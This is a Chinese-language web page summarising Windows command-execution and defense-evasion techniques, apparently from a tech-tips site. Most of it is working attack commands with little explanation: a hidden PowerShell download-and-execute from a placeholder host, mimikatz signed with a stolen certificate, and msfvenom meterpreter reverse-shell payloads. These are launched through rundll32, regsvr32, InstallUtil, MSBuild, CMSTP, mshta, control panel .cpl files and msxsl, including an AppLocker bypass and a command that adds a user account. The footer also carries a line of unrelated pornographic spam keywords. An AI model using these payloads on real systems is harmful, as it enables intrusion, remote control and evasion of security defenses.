文章詳情頁

Windows命令執(zhí)行防御規(guī)避總結

瀏覽：92日期：2022-11-12 13:56:43

今天小編為大家?guī)鞼indows命令執(zhí)行防御規(guī)避總結，具體如下：

powershell

powershell.exe -nop -w hidden -c “IEX （（new-object net.webclient）.downloadstring（‘http://xx.xx.xx.xx:8888/logo.gif’））”“ /f

SIP

通過sip劫持對惡意代碼簽名獲得系統(tǒng)信任https://github.com/secretsquirrel/SigThief

python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

rundll32.exe

生成

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

目標執(zhí)行

rundll32.exe shell32.dll，Control_RunDLL xxx.dll

Regsvr32.exe

msfconsole

auxiliary/server/regsvr32_command_delivery_server

set CMD net user test 123456 /add

目標執(zhí)行

regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

InstallUtil.exe

1.編譯后門：

C：WindowsMicrosoft.NETFramework64v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile：”C：Program Files （x86）Microsoft SDKsWindowsv10.0AbinNETFX 4.8 Toolsx64key.snk“ xxx.cs

2.靶機上運行：

InstallUtil.exe /U xxx.exe

3.msf監(jiān)聽，得到反彈的shell：

set payload windows/x64/meterpreter/reverse_tcp

set LHOST xx.xx.xx.xx

set LPORT 4444

exploit

Msbuild.exe

MSBuild是Microsoft Build Engine的縮寫，代表Microsoft和Visual Studio的新的生成平臺，MSBuild可編譯特定格式的xml文件

https://github.com/3gstudent/msbuild-inline-task

msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

-f csharp

使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

msf監(jiān)聽

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx

set lport 4444

exploit

運行

C：WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe exec64.xml

CMSTP

cmstp.exe /s /ns C：UsersadministratorAppDataLocalTempXKNqbpzl.txt繞過AppLocker并啟動惡意腳本

Mshta.exe

Mshta.exe 是一個執(zhí)行 Microsoft HTML 應用程序（HTA）的實用程序，攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執(zhí)行惡意代碼

use exploit/windows/misc/hta_server

msf exploit（windows/misc/hta_server）》 set srvhost xx.xx.xx.xx

msf exploit（windows/misc/hta_server）》 exploit

mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta

控制面板

攻擊者可以使用控制面板項作為有效載荷來執(zhí)行任意命令，控制面板項是注冊的可執(zhí)行文件（.exe）或控制面板（.cpl）文件，可以直接從命令行執(zhí)行或通過Control_RunDLL（API）調(diào)用或者直接雙擊文件。

攻擊者構造惡意的dll文件CPIApplet.dll

利用msf生成dll文件：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

傳入windows機器，然后重命名為CPIApplet.cpl，通過control.exe c：usersadministratordesktopCPIApplet.cpl 執(zhí)行命令

通過msxsl.exe調(diào)用惡意xml文件執(zhí)行腳本

制作兩個文件

customers.xml

script.xsl

xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“

xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

xmlns:user=”http://mycompany.com/mynamespace“》

function xml（nodelist） {

var r = new ActiveXObject（”WScript.Shell“）.Run（”cmd.exe /k calc.exe“）;

return nodelist.nextNode（）.xml;

}

開啟http服務

python3 -m http.server 80

遠程下載執(zhí)行

msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl

Windows系統(tǒng)

上一條：Win10怎么阻止推送Win11升級消息？Win10阻止推送Win11升級消息方法下一條：Win10添加網(wǎng)絡共享錯誤4005怎么辦？

相關文章：

1. Win7系統(tǒng)如何自定義修改鼠標指針樣式？2. Win10系統(tǒng)不能調(diào)整任務欄大小怎么辦？Win10系統(tǒng)不能調(diào)整任務欄大小的解決方法3. Win10系統(tǒng)hyper-v與vmware不兼容怎么辦？4. Win11分辨率調(diào)到了推薦但還是有黑邊的解決方法5. 基于 Ubuntu 的 elementary OS 7 版本發(fā)布附官方下載6. 每次重啟Win7系統(tǒng)后打印機都顯示脫機該怎么辦？7. Win7純凈版沒有USB驅(qū)動怎么辦？Win7系統(tǒng)沒有USB驅(qū)動解決教程8. 蘋果 macOS 13.2 開發(fā)者預覽版 Beta 2 發(fā)布9. Win7旗艦版qq語音對方聽不到我的聲音怎么辦？10. Win7窗口最大化后看不到任務欄怎么辦？Win7窗口最大化后看不到任務欄的解決方法

排行榜

					
					在Windows系統(tǒng)環(huán)境下虛擬專用網(wǎng)服務器
Windows video tools設置中文的方法
答疑：Windows XP帳戶安全問題兩則
Windows7系統(tǒng)如何打開系統(tǒng)服務面板？
深度技術win7怎么安裝
Android Studio 快捷鍵(Win/MAC) 介紹
如何判斷Win10電腦是否適用于Hyper-V虛擬機？
win10 2004版本改進 提升游戲性能 支持光線追蹤1.1版本
win10開機系統(tǒng)選擇怎么刪除
戴爾Latitude15 3000筆記本U盤怎么安裝win10系統(tǒng) 安裝win10系統(tǒng)方法分享
win7系統(tǒng)中取消開機登錄界面具體操作步驟
				

熱門標簽

国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

Windows命令執(zhí)行防御規(guī)避總結